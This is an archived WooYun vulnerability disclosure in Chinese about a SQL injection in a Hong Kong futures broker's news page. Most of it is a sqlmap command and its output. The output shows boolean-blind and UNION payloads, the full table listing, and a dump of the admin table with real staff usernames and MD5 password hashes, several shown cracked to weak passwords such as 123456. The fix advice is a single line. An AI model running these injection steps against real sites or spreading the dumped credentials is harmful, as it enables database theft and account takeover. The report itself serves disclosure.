乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-11-03: 细节已通知厂商并且等待厂商处理中 2015-11-04: 厂商已经确认,细节仅向厂商公开 2015-11-14: 细节向核心白帽子及相关领域专家公开 2015-11-24: 细节向普通白帽子公开 2015-12-04: 细节向实习白帽子公开 2015-12-19: 细节向公众公开
直达国际期货有限公司成立于2011年4月,总部位于香港。经香港证监会正式批准,依照相关法律和规定,经营香港地区及海外主要交易所的期货、期权等衍生产品之经纪业务。中央编号为AXH777。上海直达软件公司是本公司的兄弟单位,拥有近20位专业软件工程师,搭建了覆盖中国境内、韩国、香港和美国的专线网络,提供全球化交易平台、结算系统、风险管理平台及程序化交易等产品,为公司客户提供稳定、快速的交易系统,为客户交易保驾护航。2014年,直连美国芝加哥专线以及芝加哥COLO托管平台的搭建,则为公司高频交易客户创造了高速、低延迟的极速交易环境,极大的改善了内外盘套利基金及大型机构客户把握市场机会,力争毫秒领先优势。公司自成立以来,一直用心倾听和满足客户需求,与客户建立长期合作伙伴关系,迅速获得客户认可,成交量快速提升,目前已经跃居香港中资期货公司前列,牢固确立了外盘期货行业新锐翘楚的地位。
地址:http://**.**.**.**/about/showNews.html?newsid=121
python sqlmap.py -u "http://**.**.**.**/about/showNews.html?newsid=121" -p newsid --technique=BTU --random-agent --batch -D directaccess_db -T manage_admin -C id,username,userpassword --dump
---Parameter: newsid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: newsid=121 AND 3774=3774 Type: UNION query Title: MySQL UNION query (28) - 9 columns Payload: newsid=-1875 UNION ALL SELECT 28,28,CONCAT(0x71767a6b71,0x65594d545066477759426c554562796f7257515554666a69564250535451534a6b41446d50536f78,0x7162767871),28,28,28,28,28,28#---web application technology: Apacheback-end DBMS: MySQL >= 5.0.0current user: 'directaccess_ad@%'current user is DBA: Falsesqlmap resumed the following injection point(s) from stored session:---Parameter: newsid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: newsid=121 AND 3774=3774 Type: UNION query Title: MySQL UNION query (28) - 9 columns Payload: newsid=-1875 UNION ALL SELECT 28,28,CONCAT(0x71767a6b71,0x65594d545066477759426c554562796f7257515554666a69564250535451534a6b41446d50536f78,0x7162767871),28,28,28,28,28,28#---web application technology: Apacheback-end DBMS: MySQL 5database management system users [1]:[*] 'directaccess_ad'@'%'sqlmap resumed the following injection point(s) from stored session:---Parameter: newsid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: newsid=121 AND 3774=3774 Type: UNION query Title: MySQL UNION query (28) - 9 columns Payload: newsid=-1875 UNION ALL SELECT 28,28,CONCAT(0x71767a6b71,0x65594d545066477759426c554562796f7257515554666a69564250535451534a6b41446d50536f78,0x7162767871),28,28,28,28,28,28#---web application technology: Apacheback-end DBMS: MySQL 5available databases [2]:[*] directaccess_db[*] information_schemasqlmap resumed the following injection point(s) from stored session:---Parameter: newsid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: newsid=121 AND 3774=3774 Type: UNION query Title: MySQL UNION query (28) - 9 columns Payload: newsid=-1875 UNION ALL SELECT 28,28,CONCAT(0x71767a6b71,0x65594d545066477759426c554562796f7257515554666a69564250535451534a6b41446d50536f78,0x7162767871),28,28,28,28,28,28#---web application technology: Apacheback-end DBMS: MySQL 5Database: directaccess_db[81 tables]+---------------------------------+| cfaq_category || cost_category || forexfaq_category || manage_about || manage_admin || manage_admin_log || manage_business || manage_calendar || manage_cfaq || manage_config || manage_cost || manage_exchange || manage_exchange1 || manage_forexfaq || manage_formdownload || manage_good || manage_introduce || manage_jobs || manage_kaihu || manage_link || manage_match || manage_newestmargin || manage_news || manage_newsmatch || manage_notice || manage_notice1 || manage_other || manage_research || manage_sefaq || manage_sfaq || manage_share || manage_signup || manage_slider || manage_slider1 || manage_software || manage_subscribe || manage_trader || manage_trader1 || manage_trader2 || manage_trader3 || manage_trader4 || manage_trader5 || manage_trader_1 || manage_trader_2 || manage_trading || manage_variety || manage_video || manage_videokaihu || match_category || members || news_category || research_category || sefaq_category || sfaq_category || share_category || variety_category || video_category || zhida_assets || zhida_forex_ad || zhida_forex_bdxz || zhida_forex_fgg_category || zhida_forex_fyjgb_category || zhida_forex_gonggao || zhida_forex_yjbg || zhida_forex_zn || zhida_fund || zhida_futures_ad || zhida_futures_bdxz || zhida_futures_fgg_category || zhida_futures_fyjgb_category || zhida_futures_gonggao || zhida_futures_yjbg || zhida_futures_zn || zhida_home_ad || zhida_securities_ad || zhida_securities_bdxz || zhida_securities_fgg_category || zhida_securities_fyjgb_category || zhida_securities_gonggao || zhida_securities_yjbg || zhida_securities_zn |+---------------------------------+sqlmap resumed the following injection point(s) from stored session:---Parameter: newsid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: newsid=121 AND 3774=3774 Type: UNION query Title: MySQL UNION query (28) - 9 columns Payload: newsid=-1875 UNION ALL SELECT 28,28,CONCAT(0x71767a6b71,0x65594d545066477759426c554562796f7257515554666a69564250535451534a6b41446d50536f78,0x7162767871),28,28,28,28,28,28#---web application technology: Apacheback-end DBMS: MySQL 5Database: directaccess_dbTable: manage_admin[4 columns]+--------------+--------------+| Column | Type |+--------------+--------------+| content | mediumtext || id | int(11) || username | varchar(200) || userpassword | varchar(200) |+--------------+--------------+sqlmap resumed the following injection point(s) from stored session:---Parameter: newsid (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: newsid=121 AND 3774=3774 Type: UNION query Title: MySQL UNION query (28) - 9 columns Payload: newsid=-1875 UNION ALL SELECT 28,28,CONCAT(0x71767a6b71,0x65594d545066477759426c554562796f7257515554666a69564250535451534a6b41446d50536f78,0x7162767871),28,28,28,28,28,28#---web application technology: Apacheback-end DBMS: MySQL 5Database: directaccess_dbTable: manage_admin[11 entries]+------+-------------+-------------------------------------------+| id | username | userpassword |+------+-------------+-------------------------------------------+| 1001 | admin | 18ec31a168508eba89b55ca177c4d1e2 || 1000 | wp_leo | 21232f297a57a5a743894a0e4a801fc3 (admin) || 1028 | lifang | 21218cca77804d2ba1922c33e0151105 (888888) || 1036 | zhouyanfang | c2362fc70cfb1868f6afcff87fa0f7f9 || 1032 | gaoling | 21218cca77804d2ba1922c33e0151105 (888888) || 1033 | ruanjian | 21218cca77804d2ba1922c33e0151105 (888888) || 1034 | dahk | 21218cca77804d2ba1922c33e0151105 (888888) || 1035 | maomao | f83f5591de546bcfd02befe73a1b79df || 1037 | taozhaoyu | a5929dc76f8e54bbaca8bcdb21eddc39 || 1038 | leo | e10adc3949ba59abbe56e057f20f883e (123456) || 1039 | changyuqing | e10adc3949ba59abbe56e057f20f883e (123456) |+------+-------------+-------------------------------------------+
上WAF。
危害等级:高
漏洞Rank:16
确认时间:2015-11-04 18:42
已將事件通知有關機構
暂无